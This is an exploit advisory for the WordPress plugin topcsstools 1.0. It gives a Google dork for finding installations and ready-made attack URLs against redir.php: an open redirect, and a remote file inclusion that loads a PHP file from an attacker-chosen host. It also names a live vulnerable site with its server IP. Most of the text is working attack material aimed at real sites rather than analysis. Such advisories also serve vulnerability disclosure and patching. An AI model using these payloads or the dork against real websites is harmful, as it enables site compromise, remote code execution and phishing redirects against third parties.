WordPress topcsstools Plugins 1.0 RFI and Open Redirect

1. #################################################################################
2.  
3. # Exploit Title : WordPress topcsstools Plugins 1.0 Remote File Inclusion and Open Redirect
4. # Author [ Discovered By ] : KingSkrupellos
5. # Team : Cyberizm Digital Security Army
6. # Date : 14/01/2019
7. # Vendor Homepage : wordpress.org - cssgallery.com
8. # Software Information Links : cssgallery.com/premium-themes.html
9. + cssgallery.com/css-design.html
10. # Version : 1.0
11. # Tested On : Windows and Linux
12. # Category : WebApps
13. # Exploit Risk : Medium
14. # Google Dorks : inurl:''/wp-content/plugins/topcsstools/"
15. # Vulnerability Type : CWE-601 [ URL Redirection to Untrusted Site ('Open Redirect') ]
16. CWE-98 [ Improper Control of Filename for Include/
17. Require Statement in PHP Program ('PHP Remote File Inclusion') ]
18.  
19. #################################################################################
20.  
21. # Open Redirection Exploit :
22. **************************
23.  
24. /wp-content/plugins/topcsstools/redir.php?u=https://[OPEN-REDIRECT-ADDRESS-HERE.gov]
25.  
26. # RFI Remote File Inclusion Exploit :
27. **********************************
28.  
29. /wp-content/plugins/topcsstools/redir.php?u=http://[RFI-ADDRESS-HERE.gov/yourfilename.php.txt]
30.  
31. #################################################################################
32.  
33. # Example Vulnerable Site :
34. *************************
35.  
36. [+] cssgallery.com/wp-content/plugins/topcsstools/redir.php?u=http://exploit4arab.org/
37.  
38. Note : (50.63.43.1) => There are 3,158 domains hosted on this server.
39.  
40. #################################################################################
41.  
42. # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
43.  
44. #################################################################################